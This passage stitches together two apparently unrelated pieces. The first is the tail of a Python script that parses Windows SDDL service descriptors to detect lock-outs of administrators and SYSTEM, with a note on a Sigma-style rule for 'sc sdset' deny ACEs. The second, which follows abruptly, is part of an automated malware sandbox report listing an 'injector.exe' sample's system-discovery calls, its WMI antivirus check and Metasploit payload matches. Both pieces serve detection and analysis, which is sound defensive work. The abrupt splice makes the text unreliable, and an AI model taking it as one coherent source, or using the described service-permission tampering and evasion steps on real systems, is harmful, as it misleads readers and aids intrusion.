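def parse_sddl(sddl: str) -> Dict[str, List[Ace]]:
    """Return {"D": [dacl aces], "S": [sacl aces]} in descriptor order."""
    acls: Dict[str, List[Ace]] = {"D": [], "S": []}
    marks = list(SECTION_RE.finditer(sddl))
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(sddl)
        if m.group(1) not in acls:
            continue  # O: and G: carry only a SID, no ACEs
        for ace in ACE_RE.findall(sddl[m.end():end]):
            f = ace.split(";")  # type;flags;rights;object_guid;inherit_guid;trustee
            if len(f) < 6:
                raise ValueError(f"malformed ACE ({ace})")
            acls[m.group(1)].append(Ace(f[0], f[1], parse_rights(f[2]), f[5]))
    return acls


def has_right(dacl: List[Ace], trustee: str, right: str) -> bool:
    """Single-right access check: the first ACE for `trustee` that names `right`
    decides, as Windows does when walking a DACL; no matching ACE is an implicit deny.
    Group membership of the caller's token is ignored."""
    for ace in dacl:
        if ace.trustee == trustee and right in ace.rights:
            return ace.ace_type == "A"
    return False


def effective_rights(dacl: List[Ace], trustee: str) -> Set[str]:
    return {r for r in SERVICE_RIGHTS.values() if has_right(dacl, trustee, r)}


def rights_lost_vs_default(sddl: str, trustee: str) -> Set[str]:
    """Rights the trustee has under the baseline but not under `sddl`."""
    baseline = effective_rights(parse_sddl(DEFAULT_SERVICE_SDDL)["D"], trustee)
    return baseline - effective_rights(parse_sddl(sddl)["D"], trustee)


def findings(sddl: str) -> List[str]:
    """Human-readable reasons a descriptor looks like a lock-out of admins or SYSTEM."""
    dacl = parse_sddl(sddl)["D"]
    out: List[str] = []
    for ace in dacl:
        if ace.ace_type == "D" and ace.trustee in ("BA", "SY"):
            out.append(f"explicit deny for {ace.trustee}: {', '.join(sorted(ace.rights))}")
    for trustee in ("BA", "SY"):
        lost = rights_lost_vs_default(sddl, trustee)
        if lost:
            out.append(f"{trustee} loses {', '.join(sorted(lost))} relative to the default service DACL")
    return out


if __name__ == "__main__":
    for line in findings(SAMPLE_SDDL):
        print(line)
```

A Sigma-style rule can key on the deny ACE alone ("(D;;" with WP or DT for BA or SY in an sc sdset command line), but the baseline comparison also catches the quieter variant where the allow ACE is simply rewritten without WP and DT and no deny ACE is added.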

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 36_2_00007FF7019D9A24
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW, 36_2_00007FF7019D0A8C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 36_2_00007FF7019D94A4
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW, 36_2_00007FF7019D940C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW, 36_2_00007FF7019D933C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW, 36_2_00007FF7019D96F0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW, 36_2_00007FF7019D98F8
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 36_2_00007FF7019D9848
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: try_get_function,GetLocaleInfoW, 36_2_00007FF7019D0FD0
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 36_2_00007FF7019D8FF0
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D5140 cpuid 36_2_00007FF7019D5140
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BE0C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 36_2_00007FF7019BE0C8

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Remote Access Functionality:

Yara detected Metasploit Payload
Source: Yara match File source: 11.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.upd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.upd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, type: MEMORY